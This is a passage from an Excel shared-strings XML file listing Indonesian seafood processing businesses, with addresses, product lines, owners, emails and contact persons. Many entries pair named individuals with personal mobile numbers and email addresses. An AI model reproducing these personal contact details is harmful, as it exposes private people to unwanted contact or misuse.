    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Abalon Segar, Belut Segar, Tuna Segar, Ikan Pelagis Segar, Bulu Babi Segar, Cephalopoda Segar, Ikan Demersal Segar, Kepiting Segar, Udang Segar, Salmon Segar, Trout Segar, Scallop Segar</t>
  </si>
  <si>
    <t>RAYMOND HARNOTO</t>
  </si>
  <si>
    <t>nailiocean@yahoo.com</t>
  </si>
  <si>
    <t>SUCHI YULIANA 08574576</t>
  </si>
  <si>
    <t>SUCHI YULIANA</t>
  </si>
  <si>
    <t>UD. TOMINI BAY SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Raya Manado Tomohon 79, Kel. Pineleng II, Kec. Pineleng, Kabupaten Minahasa</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Dodik Sukardi</t>
  </si>
  <si>
    <t>Pineleng</t>
  </si>
  <si>
    <t>Pineleng II</t>
  </si>
  <si>
    <t>tominibayseafood@gmail.com</t>
  </si>
  <si>
    <t>0431 836530</t>
  </si>
  <si>
    <t>PT. SAMUDRA KENCANA MINA</t>
  </si>
  <si>
    <t>Pergudangan Central Square Blok E 31, Jl. Ahmad Yani No.41-43, Kel. Keboansikep, Kec. Gedangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>MANGESTI WALUYO SEDJATI</t>
  </si>
  <si>
    <t>Keboansikep</t>
  </si>
  <si>
    <t>qc.samudrakencanamina@gmail.com</t>
  </si>
  <si>
    <t>031-8547202</t>
  </si>
  <si>
    <t>TIFANI AMALIA S (082</t>
  </si>
  <si>
    <t>HERQUITANTO</t>
  </si>
  <si>
    <t>MINA MANDIRI</t>
  </si>
  <si>
    <t>Bokesan, Kel. Sindumartani, Kec. Ngemplak, Kab. Sleman</t>
  </si>
  <si>
    <t>Kering, Lainnya</t>
  </si>
  <si>
    <t>Stik Lele, Abon Lele, Abon Nila, Nila Krispy</t>
  </si>
  <si>
    <t>Sri Rejeki</t>
  </si>
  <si>
    <t>Ngemplak</t>
  </si>
  <si>
    <t>Sindumartani</t>
  </si>
  <si>
    <t>sriminamandiri@yandex.com</t>
  </si>
  <si>
    <t>Sri Rejeki 085729292634</t>
  </si>
  <si>
    <t>PT. BUANA ALAM TIRTA</t>
  </si>
  <si>
    <t>Jl. Kebun Raya No.2, Kel. Rejowinangun, Kec. Kotagede, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Capelin Beku Untuk Pakan</t>
  </si>
  <si>
    <t>KMT A. TIRTODIPROJO</t>
  </si>
  <si>
    <t>Kotagede</t>
  </si>
  <si>
    <t>Rejowinangun</t>
  </si>
  <si>
    <t>yuliana@gembiralokazoo.com</t>
  </si>
  <si>
    <t>yuliana 0815686428</t>
  </si>
  <si>
    <t>GPH. WIJOYO HARIMURTI</t>
  </si>
  <si>
    <t>PT. MULTI SARI MAKASSAR</t>
  </si>
  <si>
    <t>Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Cephalopoda Beku, Tuna Segar, Cephalopoda Segar, Udang Segar, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>TJANDRA JANTO</t>
  </si>
  <si>
    <t>Tamalanrea</t>
  </si>
  <si>
    <t>Bira</t>
  </si>
  <si>
    <t>qc@multisari.co.id</t>
  </si>
  <si>
    <t>0411-4723232, 0411-4723222</t>
  </si>
  <si>
    <t>RAHMAWATI ANWAR 0852 5513 9669</t>
  </si>
  <si>
    <t>NUR CAHYO ACHIRI</t>
  </si>
  <si>
    <t>PT. ANEKA TUNA INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Gunung Gangsir RT 007 RW 009, Kel. Nogosari, Kec. Pandaan, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Kaleng</t>
  </si>
  <si>
    <t>Tuna Kaleng</t>
  </si>
  <si>
    <t>Itochu Corp &amp; Hagoromo Foods</t>
  </si>
  <si>
    <t>Pandaan</t>
  </si>
  <si>
    <t>Nogosari</t>
  </si>
  <si>
    <t>ati2-qcdoc@ati.id</t>
  </si>
  <si>
    <t>0343-641563</t>
  </si>
  <si>
    <t>Lie Wie Sian; 0811375803</t>
  </si>
  <si>
    <t>Lie Wie Sian</t>
  </si>
  <si>
    <t>PT. TRIKO BINA NUSANTARA</t>
  </si>
  <si>
    <t>Desa Dongkala, Kec. Pasarwajo, Kabupaten Buton</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku, Fillet Ikan Beku, Ikan Pelagis Beku, Tuna Beku, Udang Beku</t>
  </si>
  <si>
    <t>PT TRIKO BINA NUSANTARA</t>
  </si>
  <si>
    <t>Pasarwajo</t>
  </si>
  <si>
    <t>Dongkala</t>
  </si>
  <si>
    <t>trikobinanusantara@gmail.com</t>
  </si>
  <si>
    <t>Anton / 0811232688</t>
  </si>
  <si>
    <t>Anton</t>
  </si>
  <si>
    <t>BIDIN</t>
  </si>
  <si>
    <t>Jl. Pelantar I No.59 H RT 003 RW 008, Kel. Tanjung Pinang Kota, Kec. Tanjung Pinang Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Tanjung Pinang Kota</t>
  </si>
  <si>
    <t>nattafun@gmail.com</t>
  </si>
  <si>
    <t>Bidin 082366663333</t>
  </si>
  <si>
    <t>PT. NELAYAN MITRA MANDIRI</t>
  </si>
  <si>
    <t>Komplek PPN Tanjungpandan, Jl. RE Martadinata, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung</t>
  </si>
  <si>
    <t>Udang Kipas Beku, Ikan Pelagis Beku, Siput Beku, Ikan Demersal Beku, Udang Beku, Kepiting Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>GERRY</t>
  </si>
  <si>
    <t>mandiri.nelayan@yahoo.com</t>
  </si>
  <si>
    <t>0719-25169</t>
  </si>
  <si>
    <t>Leni 081278181506, 08121057606</t>
  </si>
  <si>
    <t>KWET KHIONG</t>
  </si>
  <si>
    <t>PT. DELTA MINA PERKASA</t>
  </si>
  <si>
    <t>Komplek Industri dan Pergudangan Sinar Buduran II Blok A No.40, Kel. Prasung, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Totok Endrianto</t>
  </si>
  <si>
    <t>Prasung</t>
  </si>
  <si>
    <t>deltaminaperkasa@gmail.com</t>
  </si>
  <si>
    <t>(031) 99005862</t>
  </si>
  <si>
    <t>Khoirul Umam (QC) 081289839431</t>
  </si>
  <si>
    <t>PT. ERA MANDIRI CEMERLANG TBK</t>
  </si>
  <si>
    <t>Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Beku, Segar, Lainnya</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Tuna Beku, Tuna Segar, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Segar, Kerupuk Kulit Ikan, Hiu Beku, Ikan Demersal Segar, Kepiting Beku</t>
  </si>
  <si>
    <t>JOHAN ROSE</t>
  </si>
  <si>
    <t>Pademangan</t>
  </si>
  <si>
    <t>Ancol</t>
  </si>
  <si>
    <t>gopur@indonesiaseafood.net</t>
  </si>
  <si>
    <t>021-6930017</t>
  </si>
  <si>
    <t>Gopur  085100792036</t>
  </si>
  <si>
    <t>PT. INDAH JAYA BAHARI</t>
  </si>
  <si>
    <t>Jl. Samudera No.1 Blok B Pelabuhan Perikanan Samudera Kendari, Kel. Puday, Kec. Abeli, Kota Kendari</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>indahjayabahari@gmail.com</t>
  </si>
  <si>
    <t>AMBON 08114002875</t>
  </si>
  <si>
    <t>ANSRUL AMBON WANDAN</t>
  </si>
  <si>
    <t>CV. SAKURA PRIMA</t>
  </si>
  <si>
    <t>Sulawesi Barat</t>
  </si>
  <si>
    <t>Dusun Naukkaluku, Desa Lalatedong, Kec. Sendana, Kabupaten Majene</t>
  </si>
  <si>
    <t>-, Beku</t>
  </si>
  <si>
    <t>Ikan Terbang Bakar Kering, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Hj.SUTRIANI</t>
  </si>
  <si>
    <t>Sendana</t>
  </si>
  <si>
    <t>Lalatedong</t>
  </si>
  <si>
    <t>cv.sakuraprima@gmail.com</t>
  </si>
  <si>
    <t>082299994677/081337054224</t>
  </si>
  <si>
    <t>Fauzi rahman Rahim/I</t>
  </si>
  <si>
    <t>PT. SUMBER PANGAN NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Raya Buduran No.555, Kel. Buduran, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Paha Kodok Beku, Udang Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>Wiyono Pantoro</t>
  </si>
  <si>
    <t>lab.ptspn@yahoo.co.id</t>
  </si>
  <si>
    <t>MINI PLANT PANDANG LAUT (PT. KELOLA MINA LAUT)</t>
  </si>
  <si>
    <t>Dusun Barat Sungai, Kel. Banyu Sangka, Kec. Tanjung Bumi, Kabupaten Bangkalan</t>
  </si>
  <si>
    <t>Daging Rajungan Rebus Dingin</t>
  </si>
  <si>
    <t>Ruslah</t>
  </si>
  <si>
    <t>Tanjung Bumi</t>
  </si>
  <si>
    <t>Banyu Sangka</t>
  </si>
  <si>
    <t>dewi@kmlseafood.com</t>
  </si>
  <si>
    <t>Suhardi Hamzah (087701055523)</t>
  </si>
  <si>
    <t>Lamsir</t>
  </si>
  <si>
    <t>PT. SARI LAUT JAYA LESTARI</t>
  </si>
  <si>
    <t>Jl. Sampangan No.18, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>niykemukti41@gmail.com</t>
  </si>
  <si>
    <t>0333-593324</t>
  </si>
  <si>
    <t>Nike 081237374015</t>
  </si>
  <si>
    <t>CV. MUTIARA NUSA TIMUR</t>
  </si>
  <si>
    <t>Jl. Tomangambari, Kel. Songka, Kec. Wara Selatan, Kota Palopo</t>
  </si>
  <si>
    <t>Kepiting Kulit Lunak Beku</t>
  </si>
  <si>
    <t>Djamaluddin Baddolo</t>
  </si>
  <si>
    <t>Wara Selatan</t>
  </si>
  <si>
    <t>Songka</t>
  </si>
  <si>
    <t>djamaluddin.yunus@gmail.com</t>
  </si>
  <si>
    <t>PT. INSAN CITRAPRIMA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Raya Jenu - Merak Urak No.148 C, Kel. Sekardadi, Kec. Jenu, Kabupaten Tuban</t>
  </si>
  <si>
    <t>Ikan Kering, Teri Nasi Kammage, Himego Kering, Teri Nasi Kering, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>FIRDAUS RAHMAN MOESLIM</t>
  </si>
  <si>
    <t>Jenu</t>
  </si>
  <si>
    <t>Sekardadi</t>
  </si>
  <si>
    <t>ics_tuban@yahoo.co.id</t>
  </si>
  <si>
    <t>0356 712 782</t>
  </si>
  <si>
    <t>ARDINA DWI KURNIAWAN 085236808528</t>
  </si>
  <si>
    <t>ARDINA DWI KURNIAWAN</t>
  </si>
  <si>
    <t>PT. OSEANIK NUSA GLOBAL</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah Room CS-4A Blok B/37 RT 004 RW 003, Kel. Jurumundi, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Ageta saheta</t>
  </si>
  <si>
    <t>Benda</t>
  </si>
  <si>
    <t>Jurumundi</t>
  </si>
  <si>
    <t>oseanik.nusa@gmail.com</t>
  </si>
  <si>
    <t>021-30490028</t>
  </si>
  <si>
    <t>Ageta Saheta</t>
  </si>
  <si>
    <t>PT. BALI MAYA PERMAI FOOD CANNING INDUSTRY</t>
  </si>
  <si>
    <t>Jl. Raya Pengambengan, Kel. Tegal Badeng Barat, Kec. Negara, Kabupaten Jembrana</t>
  </si>
  <si>
    <t>Kaleng, Reduksi, Beku</t>
  </si>
  <si>
    <t>Tuna Kaleng, Sarden Kaleng, Makarel Kaleng, Tepung Ikan, Ikan Pelagis Beku, Tuna Beku</t>
  </si>
  <si>
    <t>YUSUF SUKARDJO</t>
  </si>
  <si>
    <t>Negara</t>
  </si>
  <si>
    <t>Tegal Badeng Barat</t>
  </si>
  <si>
    <t>pasek@bmpfood.co.id</t>
  </si>
  <si>
    <t>I Wayan Pasek 08786082236</t>
  </si>
  <si>
    <t>CANDIDO III MACAPILI BIEL</t>
  </si>
  <si>
    <t>PT. TUNA INDONESIA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.11, Kel. Klatak, Kec. Kalipuro, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Sugiarto Surya</t>
  </si>
  <si>
    <t>Klatak</t>
  </si>
  <si>
    <t>tunalointim@gmail.com</t>
  </si>
  <si>
    <t>Virmansjah N 085220274848</t>
  </si>
  <si>
    <t>Virmansjah Nurlette</t>
  </si>
  <si>
    <t>PT. ANUGRAH MARITIM SENTOSA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung, Jl Pari Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Tuna Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>KASMAN</t>
  </si>
  <si>
    <t>anugrahmasa@gmail.com</t>
  </si>
  <si>
    <t>021-66696790</t>
  </si>
  <si>
    <t>JOSUA 081382232912</t>
  </si>
  <si>
    <t>JOSUA</t>
  </si>
  <si>
    <t>PT. MARINECIPTA AGUNG</t>
  </si>
  <si>
    <t>Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Kerang Beku, Cephalopoda Beku, Sirip Hiu Kering, Cephalopoda Rebus Beku, Salmon Beku, Salmon Masak Beku</t>
  </si>
  <si>
    <t>AINOURA CANNING CO LTD &amp; SOBI MARINE PTE, LTD</t>
  </si>
  <si>
    <t>Wonokoyo</t>
  </si>
  <si>
    <t>marinecipta@gmail.com</t>
  </si>
  <si>
    <t>0343-656027</t>
  </si>
  <si>
    <t>Linda / 085607355961</t>
  </si>
  <si>
    <t>Yoichi Eguchi</t>
  </si>
  <si>
    <t>PT. INTI LAUTAN FAJAR ABADI</t>
  </si>
  <si>
    <t>Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Cephalopoda Beku, Telur Ikan Beku</t>
  </si>
  <si>
    <t>LUKMANTO LAWY</t>
  </si>
  <si>
    <t>munir@intanseafood.com</t>
  </si>
  <si>
    <t>0343 655999</t>
  </si>
  <si>
    <t>YAYUK PRIHATININGSIH</t>
  </si>
  <si>
    <t>LENNY DANUSEPUTRO</t>
  </si>
  <si>
    <t>PT. SAMUDERA SAKTI SEPAKAT</t>
  </si>
  <si>
    <t>Dusun Air Manis, Kel. Laha, Kec. Teluk Ambon, Kota Ambon</t>
  </si>
  <si>
    <t>Irwan Gozali</t>
  </si>
  <si>
    <t>Kota Ambon</t>
  </si>
  <si>
    <t>Teluk Ambon</t>
  </si>
  <si>
    <t>Laha</t>
  </si>
  <si>
    <t>ambon@samuderasakti.com</t>
  </si>
  <si>
    <t>&lt;2.5</t>
  </si>
  <si>
    <t>Oji/085945929600</t>
  </si>
  <si>
    <t>Zakaria</t>
  </si>
  <si>
    <t>UPI</t>
  </si>
  <si>
    <t>CV. DUTA RATU PERTIWI LANCAR</t>
  </si>
  <si>
    <t>Jl. Dermaga II RT 003 RW 019, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi</t>
  </si>
  <si>
    <t>Hendry Seteven</t>
  </si>
  <si>
    <t>Palabuhanratu</t>
  </si>
  <si>
    <t>duta_palabuhan@yahoo.co.id</t>
  </si>
  <si>
    <t>0266-435176</t>
  </si>
  <si>
    <t>Julius Tanzil Sumar, Alung 081288782888</t>
  </si>
  <si>
    <t>CV. SINAR TIRTA</t>
  </si>
  <si>
    <t>Jl. Rembang Industri VII/3 Pier Pasuruan, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Cephalopoda Beku, Kerang Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Bandeng Beku, Cephalopoda Segar, Ikan Air Tawar Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>Venny Susanti</t>
  </si>
  <si>
    <t>Rembang</t>
  </si>
  <si>
    <t>Pejangkungan</t>
  </si>
  <si>
    <t>cvsinartirta@gmail.com</t>
  </si>
  <si>
    <t>0343-6431155</t>
  </si>
  <si>
    <t>Ratna Antika Wardani/082233604748</t>
  </si>
  <si>
    <t>Radhitya Prastha M</t>
  </si>
  <si>
    <t>KOPERASI PERIKANAN MINA RIZKI ABADI</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Bandeng Beku, Udang Beku, Kerang Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Rusman B. Ghazali</t>
  </si>
  <si>
    <t>sulkhiheryudo@komira.co.id</t>
  </si>
  <si>
    <t>Sulkhi Firdhausya He</t>
  </si>
  <si>
    <t>M. Yusuf Ramli</t>
  </si>
  <si>
    <t>PT. IROHA SIDAT INDONESIA</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Hasil Budidaya Masak Beku, Ikan Hasil Budidaya Beku, Ikan Hasil Budidaya Segar, Salmon Mentah Beku, Ikan Demersal Beku, Udang Rebus Beku, Ikan Demersal Masak Beku, Ikan Pelagis Masak Beku, Udang Mentah Beku, Salmon Masak Beku</t>
  </si>
  <si>
    <t>Handojo Santosa</t>
  </si>
  <si>
    <t>csbwi@iroha.co.id</t>
  </si>
  <si>
    <t>Arien Indriany</t>
  </si>
  <si>
    <t>Samuel Hendroyono</t>
  </si>
  <si>
    <t>CV. TUNAS INTI NASIONAL</t>
  </si>
  <si>
    <t>JL. Margomulyo No. 44/OO-1 Surabaya, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ubur-ubur Asin</t>
  </si>
  <si>
    <t>SAHRUL MUALIM</t>
  </si>
  <si>
    <t>ASEM ROWO</t>
  </si>
  <si>
    <t>wibowocahyo816@gmail.com</t>
  </si>
  <si>
    <t>CV. SUMBER ASIA TRADING COMPANY</t>
  </si>
  <si>
    <t>Jl. Raya Tratas No.19, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Tuna Beku, Sarden Kaleng, Ikan Demesal Beku, Tuna Kaleng</t>
  </si>
  <si>
    <t>Charlie Kent Singgih</t>
  </si>
  <si>
    <t>Kedungringin</t>
  </si>
  <si>
    <t>joaan@sumberasia.com</t>
  </si>
  <si>
    <t>Joaan FM / 081252266790</t>
  </si>
  <si>
    <t>Djunaidi</t>
  </si>
  <si>
    <t>PT. ARAFURA MARINE CULTURE</t>
  </si>
  <si>
    <t>Desa Ujir, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Fillet Ikan Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>HENJERSON GAITE</t>
  </si>
  <si>
    <t>Pulau-Pulau Aru</t>
  </si>
  <si>
    <t>Ujir</t>
  </si>
  <si>
    <t>arafuramrineculture@live.com</t>
  </si>
  <si>
    <t>SAMUEL 081331170042</t>
  </si>
  <si>
    <t>CV. TIRTA SURYA SRI REJEKI</t>
  </si>
  <si>
    <t>Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Beku, Kering, Lainnya</t>
  </si>
  <si>
    <t>Teripang Beku, Perut Ikan Beku, Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering, Sirip Hiu Beku, Sirip Pari Beku, Tulang Hiu Beku, Teripang Kering, Perut Ikan Kering, Rumput Laut Kering, Daging Kerang Kering, Ubur-ubur Asin, Daging Kerang Beku, Ikan Kering, Ginseng Laut</t>
  </si>
  <si>
    <t>SATRIO WAHJOEDI</t>
  </si>
  <si>
    <t>Taman</t>
  </si>
  <si>
    <t>Jemundo</t>
  </si>
  <si>
    <t>tssr0708dok2018@gmail.com</t>
  </si>
  <si>
    <t>+31 5663260</t>
  </si>
  <si>
    <t>SANDRA / 085646778575</t>
  </si>
  <si>
    <t>SANDRA DWIKA PUTRI NURIA</t>
  </si>
  <si>
    <t>Jl. Brigjen Katamso No.24-26, Kel. Kampung Dalem, Kec. Kediri, Kota Kediri</t>
  </si>
  <si>
    <t>Paha Kodok Beku, Lobster Beku</t>
  </si>
  <si>
    <t>SOEJONO PANTORO</t>
  </si>
  <si>
    <t>Kampung Dalem</t>
  </si>
  <si>
    <t>kpantoro@yahoo.com</t>
  </si>
  <si>
    <t>081335609999, Mimi 085704702206</t>
  </si>
  <si>
    <t>PT. PINGROUN FOOD JAKARTA</t>
  </si>
  <si>
    <t>Kawasan Industri Lippo Cikarang Delta Silicon I Jl. Akasia I Kav A8 No.5A, Kel. Sukaresmi, Kec. Cikarang Selatan, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Fillet Sidat Beku, Sidat Panggang Beku</t>
  </si>
  <si>
    <t>WU JUNG FENG</t>
  </si>
  <si>
    <t>Cikarang Selatan</t>
  </si>
  <si>
    <t>Sukaresmi</t>
  </si>
  <si>
    <t>susi@pingroun.co.id</t>
  </si>
  <si>
    <t>021-89915501</t>
  </si>
  <si>
    <t>Wu Jung Feng</t>
  </si>
  <si>
    <t>PT. GEMA ISTA RAYA</t>
  </si>
  <si>
    <t>Jl. Tembero No. 17, Kel. Tanggulangin, Kec. Kejayan, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Masak Beku, Sarden Kaleng, Makerel Kaleng, Tuna Kaleng, Bekicot Kaleng</t>
  </si>
  <si>
    <t>DANNY SATYA WIJAYA</t>
  </si>
  <si>
    <t>Kejayan</t>
  </si>
  <si>
    <t>Tanggulangin</t>
  </si>
  <si>
    <t>pt_gema@rad.net.id</t>
  </si>
  <si>
    <t>0343-411997, 0343-411998</t>
  </si>
  <si>
    <t>HUSEIN WILLY</t>
  </si>
  <si>
    <t>PT. KIANTAKA RASA</t>
  </si>
  <si>
    <t>Jl. Raya Serang Km 12,5 Kampung Kadu RT 006 RW 001, Kel. Bunder, Kec. Cikupa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Lainnya, Reduksi</t>
  </si>
  <si>
    <t>Flakes Rumput Laut, Tepung Jelly, Tepung Puding, Refined Carrageenan</t>
  </si>
  <si>
    <t>WINSTON MADJUKIE</t>
  </si>
  <si>
    <t>Bunder</t>
  </si>
  <si>
    <t>alam88.kiantakarasa@gmail.com</t>
  </si>
  <si>
    <t>021-5960041</t>
  </si>
  <si>
    <t>ALAMSYAH SYAFRIE &amp; 081615599999</t>
  </si>
  <si>
    <t>PRANAJAYA GUNAWAN</t>
  </si>
  <si>
    <t>CV. MARKINDO RAYA</t>
  </si>
  <si>
    <t>Desa Pale, Kec. Tobelo Selatan, Kabupaten Halmahera Utara</t>
  </si>
  <si>
    <t>Asap</t>
  </si>
  <si>
    <t>Ikan Kayu</t>
  </si>
  <si>
    <t>RICKY YONG DODO</t>
  </si>
  <si>
    <t>Tobelo Selatan</t>
  </si>
  <si>
    <t>Pale</t>
  </si>
  <si>
    <t>wilsonpontho@gmail.com</t>
  </si>
  <si>
    <t>Nolanda Nesi Torukie, 082346830207</t>
  </si>
  <si>
    <t>PT. STARFOOD INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl. Raya Deandles Km 76, Kel. Kandang Semangkon, Kec. Paciran, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Beku, Reduksi</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Surimi Beku, Tepung Ikan</t>
  </si>
  <si>
    <t>Ir. H. Muhammad Nadjik</t>
  </si>
  <si>
    <t>Kandang Semangkon</t>
  </si>
  <si>
    <t>food@starfoodcorp.com</t>
  </si>
  <si>
    <t>Irwan</t>
  </si>
  <si>
    <t>PT. NIRVANA NIAGA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Kima 6 Kav F3/B1 - F3/B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>NURHADI SAMAD, SE.MM</t>
  </si>
  <si>
    <t>nirvanafishery@gmail.com</t>
  </si>
  <si>
    <t>0411-4742239</t>
  </si>
  <si>
    <t>DARMAWATI A. 081527131061</t>
  </si>
  <si>
    <t>Jl. Raya Surabaya Malang Km 38, Kel. Karangrejo, Kec. Gempol, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ekstrak Ikan, Salmon Kaleng, Salmon Pouch</t>
  </si>
  <si>
    <t>Hagoromo, Itochu, Solar Pasific</t>
  </si>
  <si>
    <t>Gempol</t>
  </si>
  <si>
    <t>Karangrejo</t>
  </si>
  <si>
    <t>ati-qc@ati.id</t>
  </si>
  <si>
    <t>Yossi Sudarso (085236171974)</t>
  </si>
  <si>
    <t>Kenta Inai</t>
  </si>
  <si>
    <t>PT. PERMATA MARINDO JAYA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Rebus Beku, Ikan Pelagis Rebus Beku, Ikan Demersal Rebus Beku, Cephalopoda Beku, Ikan Demersal Beku, Bandeng Beku, Ikan Pelagis Beku, Tuna Beku, Tuna Segar, Udang Beku, Udang Segar</t>
  </si>
  <si>
    <t>ADI</t>
  </si>
  <si>
    <t>muji@pttuna.com</t>
  </si>
  <si>
    <t>021-66678242</t>
  </si>
  <si>
    <t>Nyoman Rentia</t>
  </si>
  <si>
    <t>CV. HOKKY SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Perintis Kemerdekaan Ruko 237 No.17-18, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Lainnya, Segar</t>
  </si>
  <si>
    <t>Kepiting Hidup, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>HENGKY YANTO</t>
  </si>
  <si>
    <t>Sudiang</t>
  </si>
  <si>
    <t>theresia_gunardi@yahoo.com</t>
  </si>
  <si>
    <t>0411-434018</t>
  </si>
  <si>
    <t>DEWI (081355533050)</t>
  </si>
  <si>
    <t>PT. KARYA AGUNG LESTARI JAYA</t>
  </si>
  <si>
    <t>Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Udang Beku, Lobster Air Tawar Beku, Kerang Beku, Tuna Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Medan Belawan </t>
  </si>
  <si>
    <t xml:space="preserve">Bagan Deli </t>
  </si>
  <si>
    <t>ssilaban53@gmail.com</t>
  </si>
  <si>
    <t>061-6945886</t>
  </si>
  <si>
    <t>Lisa 0852588339427</t>
  </si>
  <si>
    <t>Lisa Handayani</t>
  </si>
  <si>
    <t>UD. GARUDA</t>
  </si>
  <si>
    <t>Jl. Garuda Lk IV Pulau Buaya, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Asin Kering, Ikan Pindang Kering</t>
  </si>
  <si>
    <t>Hugo Sigiarto Asalli</t>
  </si>
  <si>
    <t>gudang.garuda@yahoo.com</t>
  </si>
  <si>
    <t>Herman Selamat 081361933500 / Hugo Sigiarto Asalli 082365959595</t>
  </si>
  <si>
    <t>PT. INTI LUHUR FUJA ABADI</t>
  </si>
  <si>
    <t>Jl. Raya Cangkringmalang Km 6, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Ang Juddy, Adhie Prasetia Nugraha</t>
  </si>
  <si>
    <t>intiluhur.qa@gmail.com</t>
  </si>
  <si>
    <t>Herwanto 0811348156</t>
